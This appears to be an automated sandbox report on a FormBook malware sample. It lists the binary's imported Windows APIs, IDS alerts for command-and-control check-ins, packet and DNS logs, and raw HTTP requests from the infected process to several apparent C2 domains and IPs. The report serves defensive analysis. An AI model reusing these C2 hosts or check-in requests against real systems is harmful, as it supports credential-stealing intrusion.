                          MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                          PSAPI.DLLGetProcessMemoryInfo
                          IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                          USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                          UxTheme.dllIsThemeActive
                          KERNEL32.dllWaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, CloseHandle, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, CreateThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetLastError, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, DuplicateHandle, GetCurrentProcess, EnterCriticalSection, GetCurrentThread, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, FindNextFileW, SetEnvironmentVariableA
                          USER32.dllCopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, AdjustWindowRectEx, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, UnregisterHotKey, SystemParametersInfoW, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, GetCursorPos, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, FindWindowW, CharLowerBuffW, GetWindowTextW
                          GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                          ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                          SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHGetFolderPathW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                          ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                          OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishGreat Britain

                          Network Behavior

                          Suricata IDS Alerts

                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                          2024-09-13T12:03:17.133067+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.5494643.33.130.19080TCP
                          2024-09-13T12:03:33.505785+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54946613.228.81.3980TCP
                          2024-09-13T12:03:36.168673+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54946713.228.81.3980TCP
                          2024-09-13T12:03:38.651818+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.54946813.228.81.3980TCP
                          2024-09-13T12:03:41.188431+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.54946913.228.81.3980TCP
                          2024-09-13T12:04:05.753743+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.56130766.81.203.1080TCP
                          2024-09-13T12:04:08.333594+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.56130866.81.203.1080TCP
                          2024-09-13T12:04:14.765281+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.561309103.42.108.4680TCP

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 13, 2024 12:03:16.663372040 CEST4946480192.168.2.53.33.130.190
                          Sep 13, 2024 12:03:16.668840885 CEST80494643.33.130.190192.168.2.5
                          Sep 13, 2024 12:03:16.668940067 CEST4946480192.168.2.53.33.130.190
                          Sep 13, 2024 12:03:16.676466942 CEST4946480192.168.2.53.33.130.190
                          Sep 13, 2024 12:03:16.681515932 CEST80494643.33.130.190192.168.2.5
                          Sep 13, 2024 12:03:17.132409096 CEST80494643.33.130.190192.168.2.5
                          Sep 13, 2024 12:03:17.133006096 CEST80494643.33.130.190192.168.2.5
                          Sep 13, 2024 12:03:17.133066893 CEST4946480192.168.2.53.33.130.190
                          Sep 13, 2024 12:03:17.135849953 CEST4946480192.168.2.53.33.130.190
                          Sep 13, 2024 12:03:17.140652895 CEST80494643.33.130.190192.168.2.5
                          Sep 13, 2024 12:03:32.600406885 CEST4946680192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:32.605251074 CEST804946613.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:32.605329990 CEST4946680192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:32.623886108 CEST4946680192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:32.628793001 CEST804946613.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:33.505559921 CEST804946613.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:33.505712032 CEST804946613.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:33.505784988 CEST4946680192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:34.137274981 CEST4946680192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:35.155989885 CEST4946780192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:35.161056995 CEST804946713.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:35.161168098 CEST4946780192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:35.172633886 CEST4946780192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:35.177474976 CEST804946713.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:36.168555975 CEST804946713.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:36.168576002 CEST804946713.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:36.168586016 CEST804946713.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:36.168673038 CEST4946780192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:36.684222937 CEST4946780192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:37.702807903 CEST4946880192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:37.714778900 CEST804946813.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:37.714895010 CEST4946880192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:37.729015112 CEST4946880192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:37.734045982 CEST804946813.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:37.734102964 CEST804946813.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:38.651642084 CEST804946813.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:38.651745081 CEST804946813.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:38.651818037 CEST4946880192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:39.230942011 CEST4946880192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:40.250649929 CEST4946980192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:40.255779982 CEST804946913.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:40.255908966 CEST4946980192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:40.266074896 CEST4946980192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:40.270986080 CEST804946913.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:41.188174963 CEST804946913.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:41.188369036 CEST804946913.228.81.39192.168.2.5
                          Sep 13, 2024 12:03:41.188431025 CEST4946980192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:41.192194939 CEST4946980192.168.2.513.228.81.39
                          Sep 13, 2024 12:03:41.197104931 CEST804946913.228.81.39192.168.2.5
                          Sep 13, 2024 12:04:04.719497919 CEST6130780192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:05.057988882 CEST806130766.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:05.058089972 CEST6130780192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:05.071877003 CEST6130780192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:05.076711893 CEST806130766.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:05.076921940 CEST806130766.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:05.753561020 CEST806130766.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:05.753627062 CEST806130766.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:05.753655910 CEST806130766.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:05.753742933 CEST6130780192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:05.756361008 CEST6130780192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:06.574840069 CEST6130780192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:07.594638109 CEST6130880192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:07.599812031 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:07.599972963 CEST6130880192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:07.608773947 CEST6130880192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:07.613774061 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:08.333240032 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:08.333455086 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:08.333486080 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:08.333518028 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:08.333553076 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:08.333594084 CEST6130880192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:08.333661079 CEST6130880192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:08.340158939 CEST6130880192.168.2.566.81.203.10
                          Sep 13, 2024 12:04:08.345011950 CEST806130866.81.203.10192.168.2.5
                          Sep 13, 2024 12:04:13.884629011 CEST6130980192.168.2.5103.42.108.46
                          Sep 13, 2024 12:04:13.890727043 CEST8061309103.42.108.46192.168.2.5
                          Sep 13, 2024 12:04:13.891068935 CEST6130980192.168.2.5103.42.108.46
                          Sep 13, 2024 12:04:13.904946089 CEST6130980192.168.2.5103.42.108.46
                          Sep 13, 2024 12:04:13.910068989 CEST8061309103.42.108.46192.168.2.5
                          Sep 13, 2024 12:04:14.765163898 CEST8061309103.42.108.46192.168.2.5
                          Sep 13, 2024 12:04:14.765225887 CEST8061309103.42.108.46192.168.2.5
                          Sep 13, 2024 12:04:14.765280962 CEST6130980192.168.2.5103.42.108.46

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 13, 2024 12:02:29.737741947 CEST53517201.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:11.618417025 CEST5531253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:11.628772020 CEST53553121.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:16.640947104 CEST6315653192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:16.657495975 CEST53631561.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:32.172318935 CEST5449853192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:32.597338915 CEST53544981.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:46.203438044 CEST6237253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:47.216095924 CEST6237253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:48.215483904 CEST6237253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:50.285080910 CEST6237253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:52.027873993 CEST53623721.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:52.027889013 CEST53623721.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:52.027896881 CEST53623721.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:52.027966022 CEST53623721.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:53.129156113 CEST6081253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:54.121735096 CEST6081253192.168.2.51.1.1.1
                          Sep 13, 2024 12:03:54.129595995 CEST53608121.1.1.1192.168.2.5
                          Sep 13, 2024 12:03:59.045521021 CEST53608121.1.1.1192.168.2.5
                          Sep 13, 2024 12:04:01.545541048 CEST5644453192.168.2.51.1.1.1
                          Sep 13, 2024 12:04:02.555922985 CEST5644453192.168.2.51.1.1.1
                          Sep 13, 2024 12:04:03.559439898 CEST5644453192.168.2.51.1.1.1
                          Sep 13, 2024 12:04:04.714510918 CEST53564441.1.1.1192.168.2.5
                          Sep 13, 2024 12:04:04.714560032 CEST53564441.1.1.1192.168.2.5
                          Sep 13, 2024 12:04:04.715270996 CEST53564441.1.1.1192.168.2.5
                          Sep 13, 2024 12:04:13.362459898 CEST5181353192.168.2.51.1.1.1
                          Sep 13, 2024 12:04:13.881644011 CEST53518131.1.1.1192.168.2.5

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 13, 2024 12:03:11.618417025 CEST192.168.2.51.1.1.10xb7a1Standard query (0)www.linkbasic.netA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:16.640947104 CEST192.168.2.51.1.1.10x8d16Standard query (0)www.chamadaslotgiris.netA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:32.172318935 CEST192.168.2.51.1.1.10xc490Standard query (0)www.masteriocp.onlineA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:46.203438044 CEST192.168.2.51.1.1.10x6f42Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:47.216095924 CEST192.168.2.51.1.1.10x6f42Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:48.215483904 CEST192.168.2.51.1.1.10x6f42Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:50.285080910 CEST192.168.2.51.1.1.10x6f42Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:53.129156113 CEST192.168.2.51.1.1.10xb2e6Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:54.121735096 CEST192.168.2.51.1.1.10xb2e6Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:01.545541048 CEST192.168.2.51.1.1.10xdfd7Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:02.555922985 CEST192.168.2.51.1.1.10xdfd7Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:03.559439898 CEST192.168.2.51.1.1.10xdfd7Standard query (0)www.mediaplug.bizA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:13.362459898 CEST192.168.2.51.1.1.10x6745Standard query (0)www.independent200.orgA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 13, 2024 12:03:11.628772020 CEST1.1.1.1192.168.2.50xb7a1Name error (3)www.linkbasic.netnonenoneA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:16.657495975 CEST1.1.1.1192.168.2.50x8d16No error (0)www.chamadaslotgiris.netchamadaslotgiris.netCNAME (Canonical name)IN (0x0001)false
                          Sep 13, 2024 12:03:16.657495975 CEST1.1.1.1192.168.2.50x8d16No error (0)chamadaslotgiris.net3.33.130.190A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:16.657495975 CEST1.1.1.1192.168.2.50x8d16No error (0)chamadaslotgiris.net15.197.148.33A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:32.597338915 CEST1.1.1.1192.168.2.50xc490No error (0)www.masteriocp.onlinedns.ladipage.comCNAME (Canonical name)IN (0x0001)false
                          Sep 13, 2024 12:03:32.597338915 CEST1.1.1.1192.168.2.50xc490No error (0)dns.ladipage.com13.228.81.39A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:32.597338915 CEST1.1.1.1192.168.2.50xc490No error (0)dns.ladipage.com18.139.62.226A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:32.597338915 CEST1.1.1.1192.168.2.50xc490No error (0)dns.ladipage.com54.179.173.60A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:52.027873993 CEST1.1.1.1192.168.2.50x6f42Server failure (2)www.mediaplug.biznonenoneA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:52.027889013 CEST1.1.1.1192.168.2.50x6f42Server failure (2)www.mediaplug.biznonenoneA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:52.027896881 CEST1.1.1.1192.168.2.50x6f42Server failure (2)www.mediaplug.biznonenoneA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:52.027966022 CEST1.1.1.1192.168.2.50x6f42Server failure (2)www.mediaplug.biznonenoneA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:03:59.045521021 CEST1.1.1.1192.168.2.50xb2e6Server failure (2)www.mediaplug.biznonenoneA (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.714510918 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.714510918 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.714510918 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.714560032 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.714560032 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.714560032 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.715270996 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.10A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.715270996 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.135A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:04.715270996 CEST1.1.1.1192.168.2.50xdfd7No error (0)www.mediaplug.biz66.81.203.200A (IP address)IN (0x0001)false
                          Sep 13, 2024 12:04:13.881644011 CEST1.1.1.1192.168.2.50x6745No error (0)www.independent200.org103.42.108.46A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • www.chamadaslotgiris.net
                          • www.masteriocp.online
                          • www.mediaplug.biz
                          • www.independent200.org

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.5494643.33.130.190802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:03:16.676466942 CEST529OUTGET /gqyt/?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd HTTP/1.1
                          Host: www.chamadaslotgiris.net
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Language: en-US
                          Connection: close
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                          Sep 13, 2024 12:03:17.132409096 CEST407INHTTP/1.1 200 OK
                          Server: openresty
                          Date: Fri, 13 Sep 2024 10:03:17 GMT
                          Content-Type: text/html
                          Content-Length: 267
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 48 53 68 2d 54 74 68 3d 4e 5a 65 53 70 2f 4d 38 42 6b 49 4c 44 6d 78 6a 6f 52 36 45 48 79 72 45 32 6b 67 37 68 48 50 52 47 69 66 7a 30 2f 74 6d 56 69 32 62 31 6f 56 4f 35 4e 65 48 65 4c 32 75 6c 7a 4f 6e 66 34 49 79 32 63 74 6a 45 76 53 38 33 34 77 30 35 67 4d 73 36 4d 51 79 6b 41 35 58 74 33 72 6a 71 35 69 31 75 6d 38 35 44 77 57 39 30 6b 75 4f 36 4a 61 69 6e 69 65 6f 32 34 47 7a 30 4c 73 35 35 5a 49 50 59 77 3d 3d 26 31 48 71 68 3d 5f 4e 74 44 64 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                          Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GHSh-Tth=NZeSp/M8BkILDmxjoR6EHyrE2kg7hHPRGifz0/tmVi2b1oVO5NeHeL2ulzOnf4Iy2ctjEvS834w05gMs6MQykA5Xt3rjq5i1um85DwW90kuO6Jainieo24Gz0Ls55ZIPYw==&1Hqh=_NtDd"}</script></head></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.54946613.228.81.39802136C:\Program Files (x86)\TDdSfBzfXovnKqobPdHqRRpMHdJbtbaVAvEsSnaXrShDnnQXWCINlPMeJBjZvM\rYmePGTGlPk.exe
                          TimestampBytes transferredDirectionData
                          Sep 13, 2024 12:03:32.623886108 CEST797OUTPOST /p5rq/ HTTP/1.1
                          Host: www.masteriocp.online
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                          Accept-Encoding: gzip, deflate, br
                          Accept-Language: en-US
                          Connection: close
                          Content-Length: 209
                          Content-Type: application/x-www-form-urlencoded
                          Cache-Control: no-cache
                          Origin: http://www.masteriocp.online
                          Referer: http://www.masteriocp.online/p5rq/
                          User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
